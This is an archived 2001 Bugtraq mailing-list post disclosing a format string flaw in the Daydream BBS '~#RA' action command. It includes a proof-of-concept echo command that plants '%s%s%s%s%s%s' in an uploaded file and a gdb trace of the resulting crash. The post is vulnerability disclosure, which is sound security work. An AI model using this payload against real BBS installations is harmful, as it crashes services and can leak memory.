[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Daydream BBS Format strings issue.
From: KF <dotslash () snosoft ! com>
Date: 2001-12-31 0:14:31
[Download RAW message or body]
Daydream BBS recently underwent some security changes.Although the
buffer overflow
was fixed in the ~#RA command I am not sure if a format strings issue
was addressed Its my
understanding that the users of daydream have the option of adding
"Action commands"
("~#RA being one of them")into the text files that they post. If a user
forms a specialy crafted
text file uploads to daydream and then views the message using the menu
system the issue
could be exploited.
background info:
~#RA[FILE]|[max]|
Show random textfile. Format for file is "/path/foobar%d.ext",
where %d is a random
number (1-[max]).
example:
echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx. Then place this file on the server and \
view it via the menu system.
Simple test to proove existance:
[root@linuxppc <mailto:root@linuxppc> bbs]# echo "~#RA%s%s%s%s%s%s" > \
display/iso/welcome.gfx
·| All accounts deleted - login |·
:| as NEW! |:
.:| |:.
. ....:::| NEW / CHAT / LOGOFF |:::.... .
`------------------------------'
Username: test
Password: ****
Program received signal SIGSEGV, Segmentation fault.
formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",
flags=268615586) at typetext.c:594
594 *cm++ = *sr++;
(gdb) bt
#0 formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",
flags=268615586) at typetext.c:594
(gdb) x/10s $r1
0x7fffd440: "\177ÿÚ\220\020\001Öì%s%s%s%s%s%s\n"
-KF
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic